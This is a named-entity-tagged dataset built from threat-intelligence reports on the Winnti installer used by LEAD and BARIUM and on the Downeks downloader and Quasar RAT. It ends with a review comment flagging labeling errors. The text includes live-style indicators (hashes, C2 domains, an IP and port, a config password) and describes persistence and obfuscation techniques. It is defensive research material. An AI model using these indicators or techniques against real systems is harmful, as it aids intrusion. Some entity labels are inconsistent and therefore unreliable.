O + +Instead O +, O +the O +group O +often O +simply O +emails S-TOOL +a O +Winnti B-TOOL +installer E-TOOL +to O +potential O +victims O +, O +relying O +on O +basic O +social O +engineering O +tactics O +to O +convince O +recipients O +to O +run O +the O +attached O +malware O +. O + +In O +some O +other O +cases O +, O +LEAD S-APT +gains O +access O +to O +a O +target O +by O +brute-forcing O +remote B-TOOL +access I-TOOL +login I-TOOL +credentials E-TOOL +, O +performing O +SQL B-TOOL +injection E-TOOL +, O +or O +exploiting O +unpatched O +web B-TOOL +servers E-TOOL +, O +and O +then O +they O +copy O +the O +Winnti S-MAL +installer O +directly O +to O +compromised O +machines O +. O + +Microsoft B-SECTEAM +Analytics E-SECTEAM +shows O +that O +Winnti S-MAL +has O +been O +used O +in O +intrusions O +carried O +out O +throughout O +Asia S-LOC +, O +Europe S-LOC +, O +Oceania S-LOC +, O +the B-LOC +Middle I-LOC +East E-LOC +, O +and O +the B-LOC +United I-LOC +States E-LOC +in O +the O +last B-TIME +six I-TIME +months E-TIME +. O + +The O +most O +recent O +series O +of O +attacks O +observed O +was O +in O +December B-TIME +2016 E-TIME +. O + +Although O +tracking O +threats O +like O +Winnti S-MAL +involves O +old-fashioned O +investigative O +work O +, O +Microsoft O +Threat O +Intelligence O +analysts O +take O +advantage O +of O +machine B-TOOL +learning E-TOOL +to O +work O +at O +scale O +. O + +When O +attackers O +used O +Winnti S-MAL +to O +maintain O +access O +to O +web O +servers O +, O +they O +hid O +the O +implant O +in O +plain O +sight O +by O +masquerading O +it O +as O +a O +trusted O +, O +legitimate O +file O +. O + +This O +was O +the O +case O +in O +two O +known O +intrusions O +in O +2015 S-TIME +, O +where O +attackers O +named O +the O +implant O +DLL S-TOOL +“ O +ASPNET_FILTER.DLL S-FILE +” O +to O +disguise O +it O +as O +the O +DLL S-TOOL +for O +the O +ASP.NET S-FILE +ISAPI O +Filter O +. 
O + +Although O +there O +are O +obvious O +differences O +between O +the O +legitimate O +file O +and O +the O +malicious O +one O +, O +filtering O +out O +the O +malicious O +file O +would O +involve O +going O +through O +a O +data O +set O +with O +noise O +from O +millions O +of O +possible O +file O +names O +, O +software O +publishers O +, O +and O +certificates O +. O + +Microsoft S-IDTY +researchers O +used O +a O +combination O +of O +anomaly B-TOOL +detection E-TOOL +and O +supervised B-TOOL +machine I-TOOL +learning E-TOOL +to O +reduce O +the O +data O +set O +and O +separate O +meaningful O +, O +malware-related O +anomalies O +from O +benign O +data O +. O + +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +helps O +network O +security O +professionals O +deal O +with O +intrusions O +from O +activity O +groups O +like O +LEAD S-APT +and O +BARIUM S-APT +in O +several O +ways O +. O + +The O +following O +examples O +were O +developed O +using O +a O +Winnti S-MAL +installer O +that O +was O +used O +in O +attacks O +in O +December B-TIME +2016 E-TIME +. O + +Microsoft B-SECTEAM +Threat I-SECTEAM +Intelligence E-SECTEAM +continually O +tracks O +activity O +groups O +such O +as O +LEAD S-APT +and O +BARIUM S-APT +and O +documents O +the O +tactics O +, O +techniques O +, O +and O +procedures O +they O +employ O +in O +their O +attacks O +, O +with O +a O +special O +focus O +on O +the O +tools O +and O +infrastructure O +they O +use O +to O +facilitate O +those O +attacks O +. O + +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +continuously O +monitors O +protected O +systems O +for O +such O +indicators O +of O +hostile O +activity O +and O +alerts O +security B-TOOL +operations I-TOOL +center E-TOOL +( O +SOC S-TOOL +) O +personnel O +to O +their O +presence O +. 
O + +To O +provide O +context O +around O +such O +alerts O +, O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +also O +features O +a O +short O +summary O +of O +the O +group O +’s O +history O +, O +goals O +, O +methods O +, O +and O +tools O +, O +with O +links O +to O +extensive O +documentation O +for O +technically O +minded O +users O +. O + +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +is O +also O +capable O +of O +detecting O +previously O +unknown O +attacks O +by O +monitoring O +system O +behavior O +indicative O +of O +hostile O +activity O +, O +including O +: O + +Malware O +installation O +, O +persistence O +, O +and O +activation O +. O + +Backdoor O +command O +and O +control O +. O + +Credential O +theft O +. O + +Lateral O +movement O +to O +other O +machines O +on O +the O +network O +. O + +For O +example O +, O +numerous O +malware O +families O +register O +themselves O +as O +services O +during O +installation O +to O +guarantee O +persistence O +across O +reboots O +. O + +A O +majority O +of O +malware O +that O +perform O +this O +persistence O +technique O +modify O +the O +necessary O +registry O +keys O +in O +ways O +that O +do O +not O +fit O +the O +profile O +of O +a O +legitimate O +program O +. O + +Winnti S-MAL +is O +no O +exception O +, O +and O +so O +, O +during O +Winnti S-MAL +’s O +installation O +process O +, O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +is O +able O +to O +raise O +behavioral O +alerts O +. O + +To O +improve O +coverage O +while O +minimizing O +false O +positives O +, O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +uses O +the O +intelligent O +security O +graph O +to O +differentiate O +between O +suspicious O +and O +benign O +behavior O +before O +generating O +alerts O +. 
O + +It O +considers O +the O +age O +of O +the O +file O +, O +its O +global O +prevalence O +, O +and O +the O +presence O +and O +validity O +of O +a O +digital O +signature O +along O +with O +the O +method O +of O +service O +creation O +. O + +For O +alerts O +raised O +either O +by O +specific O +threat O +intelligence O +tied O +to O +activity O +groups O +or O +by O +more O +generic O +suspicious O +behaviors O +, O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +provides O +rich O +, O +visualized O +technical O +context O +. O + +This O +visual O +context O +enables O +SOC O +personnel O +to O +investigate O +alerts O +with O +all O +related O +artifacts O +, O +understand O +the O +scope O +of O +the O +breach O +, O +and O +prepare O +a O +comprehensive O +action O +plan O +. O + +In O +the O +screenshots O +below O +, O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +clearly O +presents O +the O +Winnti B-ACT +installation E-ACT +where O +an O +installer O +drops O +a O +DLL S-TOOL +to O +disk O +, O +loads O +the O +DLL S-TOOL +using O +rundll32 O +, O +sets O +the O +DLL S-TOOL +as O +a O +service O +, O +and O +saves O +a O +copy O +of O +itself O +in O +C:\Windows\Help O +. O + +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +displays O +these O +activities O +as O +process O +trees O +in O +a O +machine O +timeline O +for O +the O +infected O +computer O +. O + +Analysts O +can O +easily O +extract O +detailed O +information O +from O +these O +trees O +, O +such O +as O +the O +implant O +DLL S-TOOL +dropped O +by O +the O +installer O +, O +the O +command O +used O +to O +call O +rundll32.exe S-FILE +and O +load O +the O +DLL S-TOOL +, O +and O +the O +registry O +modifications O +that O +set O +the O +DLL S-TOOL +as O +a O +service O +. O + +This O +information O +can O +provide O +an O +initial O +means O +by O +which O +to O +assess O +the O +scope O +of O +the O +breach O +. 
O + +The B-OS +Windows I-OS +10 I-OS +Creators I-OS +Update E-OS +will O +bring O +several O +enhancements O +to O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +that O +will O +provide O +SOC O +personnel O +with O +options O +for O +immediate O +mitigation O +of O +a O +detected O +threat O +. O + +If O +an O +intruder O +compromises O +a O +computer O +that O +has O +been O +onboarded O +to O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +, O +SOC O +personnel O +can O +isolate O +the O +computer O +from O +the O +network O +, O +blocking O +command O +and O +control O +of O +the O +implant O +and O +preventing O +attackers O +from O +installing O +additional O +malware O +and O +moving O +laterally O +to O +other O +computers O +in O +the O +network O +. O + +Meanwhile O +, O +connectivity O +to O +the O +Windows S-OS +Defender O +ATP O +service O +is O +maintained O +. O + +While O +the O +machine O +is O +in O +isolation O +, O +SOC O +personnel O +can O +direct O +the O +infected O +machine O +to O +collect O +live O +investigation O +data O +, O +such O +as O +the O +DNS S-PROT +cache O +or O +security O +event O +logs O +, O +which O +they O +can O +use O +to O +verify O +alerts O +, O +assess O +the O +state O +of O +the O +intrusion O +, O +and O +support O +follow-up O +actions O +. O + +Another O +option O +is O +to O +simply O +halt O +and O +quarantine O +the O +Winnti B-MAL +implant E-MAL +itself O +, O +stopping O +the O +intrusion O +on O +a O +single O +machine O +. O + +LEAD S-APT +and O +BARIUM S-APT +are O +not O +known O +for O +large-scale B-ACT +spear-phishing E-ACT +, O +so O +it O +is O +unlikely O +that O +SOC O +personnel O +would O +have O +to O +deal O +with O +multiple O +machines O +having O +been O +compromised O +by O +these O +groups O +at O +the O +same O +time O +. 
O + +Nevertheless O +, O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +also O +supports O +blocking O +the O +implant O +across O +the O +entire O +enterprise O +, O +stopping O +large-scale O +intrusions O +in O +the O +early O +stages O +. O + +With O +the O +enhanced B-TOOL +post-breach I-TOOL +detection I-TOOL +capabilities E-TOOL +of O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +, O +SOC O +personnel O +are O +able O +to O +reduce O +this O +period O +to O +hours O +or O +even O +minutes O +, O +significantly O +lessening O +the O +potential O +impact O +of O +persistent O +attacker O +access O +to O +their O +network O +. O + +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +provides O +extensive O +information O +about O +activity O +groups O +responsible O +for O +the O +attacks O +, O +enabling O +customers O +to O +understand O +aspects O +of O +the O +attack O +that O +may O +not O +be O +obtained O +by O +network O +and O +endpoint O +sensors O +, O +such O +as O +common O +social O +engineering O +lures O +and O +the O +regional O +nature O +of O +an O +attack O +. O + +With O +relevant B-TOOL +visualized I-TOOL +information E-TOOL +, O +analysts O +are O +able O +to O +study O +malware O +behavior O +on O +impacted O +machines O +, O +so O +they O +can O +investigate O +further O +and O +plan O +out O +their O +response O +. O + +Detecting O +threat O +actors O +in O +recent O +German S-LOC +industrial O +attacks O +with O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +. O + +Detecting O +threat O +actors O +in O +recent O +German S-LOC +industrial O +attacks O +with O +Windows B-TOOL +Defender I-TOOL +ATP E-TOOL +. O + +Downeks S-MAL +and O +Quasar B-MAL +RAT E-MAL +Used O +in O +Recent O +Targeted O +Attacks O +Against O +Governments O +. 
O + +Palo B-IDTY +Alto I-IDTY +Networks I-IDTY +Traps I-IDTY +Advanced I-IDTY +Endpoint I-IDTY +Protection E-IDTY +recently O +prevented O +recent O +attacks O +that O +we O +believe O +are O +part O +of O +a O +campaign O +linked O +to O +DustySky S-ACT +. O + +DustySky S-ACT +is O +a O +campaign O +which O +others O +have O +attributed O +to O +the O +Gaza B-APT +Cybergang I-APT +group E-APT +, O +a O +group O +that O +targets O +government O +interests O +in O +the O +region O +. O + +This O +report O +shares O +our O +researchers O +’ O +analysis O +of O +the O +attack O +and O +Remote B-TOOL +Access I-TOOL +Tool E-TOOL +( O +RAT E-TOOL +) O +. O + +We O +also O +discovered O +during O +our O +research O +that O +the O +RAT S-TOOL +Server O +used O +by O +this O +attacker O +is O +itself O +vulnerable O +to O +remote O +attack O +, O +a O +double-edged O +sword O +for O +these O +attackers O +. O + +The O +initial O +infection O +vector O +in O +this O +attack O +is O +not O +clear O +, O +but O +it O +results O +in O +installing O +the O +“ O +Downeks S-MAL +” O +downloader O +, O +which O +in O +turn O +infects O +the O +victim O +computer O +with O +the O +“ O +Quasar S-MAL +” O +RAT S-TOOL +. O + +Downeks S-MAL +uses O +third B-TOOL +party I-TOOL +websites E-TOOL +to O +determine O +the O +external O +IP O +of O +the O +victim O +machine O +, O +possibly O +to O +determine O +victim O +location O +with O +GeoIP S-TOOL +. O + +It O +also O +drops O +decoy O +documents O +in O +an O +attempt O +to O +camouflage O +the O +attack O +. O + +Quasar S-MAL +is O +a O +.NET S-TOOL +Framework-based O +open-source O +RAT S-TOOL +. O + +The O +attackers O +invested O +significant O +effort O +in O +attempting O +to O +hide O +the O +tool O +by O +changing O +the O +source O +code O +of O +the O +RAT S-TOOL +and O +the O +RAT S-TOOL +server O +, O +and O +by O +using O +an O +obfuscator O +and O +packer O +. 
O + +Unit O +42 O +researchers O +observed O +the O +Quasar B-TOOL +RA E-TOOL +being O +prevented O +from O +executing O +on O +a O +Traps-protected O +client O +in O +September B-TIME +2016 E-TIME +. O + +We O +observed O +these O +Quasar S-MAL +samples O +: O + +f-secure.exe S-FILE +: O +99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f S-SHA2 +connects O +to O +hnoor.newphoneapp.com S-DOM +. O + +HD_Audio.exe S-FILE +: O +0c4aa50c95c990d5c5c55345626155b87625986881a2c066ce032af6871c426a S-SHA2 +connects O +to O +manual.newphoneapp.com S-DOM +. O + +HD_Audio.exe S-FILE +: O +86bd78b4c8c94c046d927fb29ae0b944bf2a8513a378b51b3977b77e59a52806 S-SHA2 +crashes O +upon O +execution O +. O +sim.exe S-FILE +723108103ccb4c166ad9cdff350de6a898489f1dac7eeab23c52cd48b9256a42 S-SHA2 +connects O +to O +hnoor.newphoneapp.com S-DOM +. O + +Further O +research O +found O +other O +Quasar S-MAL +examples O +, O +an O +attack S-ACT +earlier O +in O +the O +month O +2016 S-TIME +on O +the O +same O +target O +: O + +SHA256 S-ENCR +: O +1ac624aaf6bbc2e3b966182888411f92797bd30b6fcce9f8a97648e64f13506f S-SHA2 +. O + +We O +found O +the O +same O +Quasar S-MAL +code O +in O +an O +additional O +attack O +on O +the O +same O +day O +, O +but O +upon O +a O +different O +target O +. O + +A O +second O +Quasar S-MAL +sample O +was O +also O +observed O +attacking O +this O +new O +victim O +: O + +SHA256 S-ENCR +: O +99a7cb43fb2898810956b6137d803c8f97651e23f9f13e91887f188749bd5e8f S-SHA2 +. O + +We O +do O +not O +have O +detailed O +visibility O +into O +the O +specific O +host O +attacked O +, O +and O +have O +not O +been O +able O +to O +reproduce O +the O +second O +stage O +of O +the O +attack O +in O +our O +lab O +. 
O + +However O +, O +based O +upon O +the O +timeframe O +of O +subsequent O +telemetry O +we O +observe O +, O +we O +understand O +the O +attack B-ACT +chain E-ACT +as O +follows O +: O + +The O +initial O +dropper O +( O +which O +varies O +across O +attacks O +) O +is O +delivered O +to O +the O +victim O +via O +email S-TOOL +or O +web O +: O + +File O +Name O +: O +Joint B-FILE +Ministerial I-FILE +Council I-FILE +between I-FILE +the I-FILE +GCC I-FILE +and I-FILE +the I-FILE +EU I-FILE +Council.exe E-FILE +” O +. O + +SHA256 S-ENCR +0d235478ae9cc87b7b907181ccd151b618d74955716ba2dbc40a74dc1cdfc4aa S-SHA2 +. O + +The O +initial O +dropper O +, O +upon O +execution O +, O +extracts O +an O +embedded O +Downeks S-MAL +instance O +: O + +File O +Name O +: O +ati.exe S-FILE +. O + +SHA256 S-ENCR +f19bc664558177b7269f52edcec74ecdb38ed2ab9e706b68d9cbb3a53c243dec S-SHA2 +. O + +Downeks S-MAL +makes O +a O +POST O +request O +to O +dw.downloadtesting.com S-DOM +, O +resulting O +in O +the O +installation O +of O +the O +Quasar S-MAL +RAT S-TOOL +on O +the O +victim O +machine O +. O + +Additional O +Downeks S-MAL +downloaders O +connecting O +to O +the O +previously-observed B-TOOL +server E-TOOL +dw.downloadtesting.com S-DOM +were O +also O +found O +in O +this O +attack O +: O + +SHA256 S-ENCR +15abd32342e87455b73f1e2ecf9ab10331600eb4eae54e1dfc25ba2f9d8c2e8a S-SHA2 +. O + +SHA256 S-ENCR +9a8d73cb7069832b9523c55224ae4153ea529ecc50392fef59da5b5d1db1c740 S-SHA2 +. O + +Further O +research O +identified O +dozens O +of O +Dowenks S-MAL +and O +Quasar S-MAL +samples O +related O +to O +these O +attackers O +. O + +All O +included O +decoy B-TOOL +document E-TOOL +written O +in O +Arabic O +( O +all O +related O +to O +Middle B-LOC +Eastern E-LOC +politics O +) O +or O +Hebrew O +. 
O + +Most O +of O +them O +use O +the O +same O +mutex S-TOOL +structure O +, O +share O +the O +same O +fake O +icon O +and O +unique O +metadata O +details O +, O +file O +writes O +, O +registry O +operations O +, O +and O +fake O +common O +program O +metadata O +, O +as O +seen O +in O +DustySky S-ACT +samples O +. O + +The O +Downeks S-MAL +downloader O +and O +Quasar S-MAL +C2 S-TOOL +infrastructures O +are O +each O +self-contained O +and O +independent O +of O +each O +other O +. O + +However O +, O +we O +did O +find O +a O +single O +shared O +IP S-PROT +address O +demonstrably O +connecting O +the O +Downeks S-MAL +downloader O +and O +Quasar S-MAL +C2 S-TOOL +infrastructure O +. O + +We O +saw O +five O +samples O +built O +on O +the O +same O +date O +in O +December B-TIME +2015 E-TIME +, O +and O +six O +on O +the O +same O +date O +in O +January S-TIME +, O +further O +solidifying O +the O +link O +between O +each O +sample O +. O + +We O +analyzed O +a O +Quasar S-MAL +sample O +we O +found O +that O +was O +communicating O +with O +an O +active O +C2 S-TOOL +server O +at O +the O +time O +of O +analysis O +: O + +SHA256 S-ENCR +: O +4393ff391396cdfd229517dd98aa7faecad04da479fe8ca322f035ceee363273 S-SHA2 +. O + +Quasar S-MAL +is O +a O +publicly-available O +commodity O +RAT S-TOOL +, O +an O +evolution O +of O +his O +earlier O +xRAT S-TOOL +, O +by O +German S-LOC +developer O +“ O +MaxXor O +” O +. O + +This O +sample O +is O +a O +modified O +version O +of O +Quasar S-MAL +, O +most O +likely O +forked O +from O +open O +source O +version O +1.2.0.0 O +on O +GitHub O +. O + +The O +client O +was O +likely O +built O +using O +the O +Quasar S-MAL +server O +client O +builder O +. O + +We O +observed O +the O +following O +customizations O +: O + +C2 S-TOOL +server O +: O +app.progsupdate.com S-DOM +, O +which O +resolved O +to O +185.141.25.68 S-IP +) O +, O +over O +port O +4664 O +. 
O + +Quasar S-MAL +mutex O +name O +: O +VMFvdCsC7RFqerZinfV0sxJFo S-FILE +. O + +Keylogger O +log O +location O +: O +Users\hJTQwqwwSCkZU\AppData\Roaming\GoogleDesktop\ O +. O + +The O +malware O +uses O +fake B-TOOL +version I-TOOL +information E-TOOL +to O +appear O +as O +a O +Microsoft S-IDTY +update O +program O +, O +as O +well O +as O +Google B-TOOL +Desktop I-TOOL +once I-TOOL +unpacked E-TOOL +. O + +This O +sample O +is O +packed O +by O +“ O +Netz S-TOOL +” O +, O +a O +simple O +.NET S-TOOL +Framework O +packer O +which O +stores O +the O +original O +executable O +compressed O +( O +zlib O +) O +as O +a O +resource O +. O + +At O +runtime O +, O +the O +packer O +decompresses O +the O +resource O +and O +uses O +Reflection O +to O +load O +the O +assembly O +, O +find O +its O +Entry O +point O +, O +and O +Invoke O +it O +. O + +Extracting O +the O +payload O +is O +straight O +forward O +– O +we O +simply O +dump O +the O +resource O +and O +decompress O +it O +. O + +We O +discovered O +that O +the B-FILE +sample E-FILE +was O +obfuscated S-TOOL +using O +.NET B-TOOL +reactor E-TOOL +. O + +It O +is O +possible O +to O +decompile O +the O +deobfuscated O +sample O +and O +retrieve O +most O +of O +the O +original O +source O +code O +but O +not O +enough O +to O +compile O +it O +easily O +. O + +After O +deobfuscation S-TOOL +we O +extracted O +: O + +SHA256 S-ENCR +: O +d773b12894d4a0ffb0df328e7e1aa4a7112455e88945a10471650e503eecdb3d S-SHA2 +. O + +After O +decompiling O +the O +sample O +, O +we O +were O +able O +to O +document O +the O +modifications O +from O +the O +open-source O +Quasar S-MAL +. O + +The O +configuration O +of O +Quasar S-MAL +is O +stored O +in O +the O +Settings O +object O +, O +which O +is O +encrypted O +with O +a O +password O +which O +is O +itself O +stored O +unencrypted O +. 
O + +Modifications O +: O + +The O +ISCHECKIP S-MAL +and O +INSTARTUPFOLDER S-MAL +are O +not O +found O +in O +open O +source O +Quasar S-MAL +samples O +. O + +The O +sample O +we O +analyzed O +is O +using O +RijndaelManaged S-ENCR +with O +ECB B-ENCR +mode E-ENCR +and O +PKCS7 B-ENCR +padding E-ENCR +. O + +The O +key O +is O +the O +SHA256 S-ENCR +hash O +of O +the O +hard-coded O +password O +. O + +The O +password O +of O +the O +sample O +we O +analyzed O +is O +: O +“ O +6y7u^Y&U6y7u^Y&U6y7u^Y&U O +” O +. O + +Although O +at O +first O +glance O +this O +appears O +somewhat O +complex O +, O +it O +is O +in O +fact O +a O +rather O +simple O +, O +repeated O +keyboard O +sequence O +. O + +We O +observe O +similar O +keyboard O +patterns O +in O +other O +samples O +: O +“ O +567%^& O +” O +, O +“ O +zxc!@#ASD O +” O +. O + +Modifications O +: O + +Uses O +SHA256 S-ENCR +instead O +of O +MD5 S-ENCR +to O +create O +the O +key O +. O
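Review bot: Entity labels in this hunk are inconsistent for the same surface forms, which will hurt any model trained on this split; in the first sentence `Quasar B-TOOL` / `RA E-TOOL` (also a truncation of "RAT") is tagged TOOL while every later mention is `Quasar S-MAL`, the mutex string `VMFvdCsC7RFqerZinfV0sxJFo S-FILE` is tagged as a file while the keylogger path `Users\hJTQwqwwSCkZU\AppData\Roaming\GoogleDesktop\ O` is left untagged, the configuration field names `ISCHECKIP S-MAL` / `INSTARTUPFOLDER S-MAL` are tagged as malware, and the generic phrase `the B-FILE sample E-FILE` is tagged as a file name. A sentence boundary is also missing in the sample list: `execution O` `. O` is followed directly by `sim.exe S-FILE` with no blank separator line, so two sentences are merged into one sequence. The token `Dowenks S-MAL` looks like a typo for Downeks that should be normalised or at least noted, and the stray `” O` after `Council.exe E-FILE` and `) O` after `185.141.25.68 S-IP` are unbalanced punctuation carried over from the source text. Suggest adding a pre-commit consistency check that flags the same token string receiving different entity types across the file, verifies that every non-empty block ends before a blank line, and enforces the B-/I-/E-/S- prefix order, then regenerating this file before it is used for training.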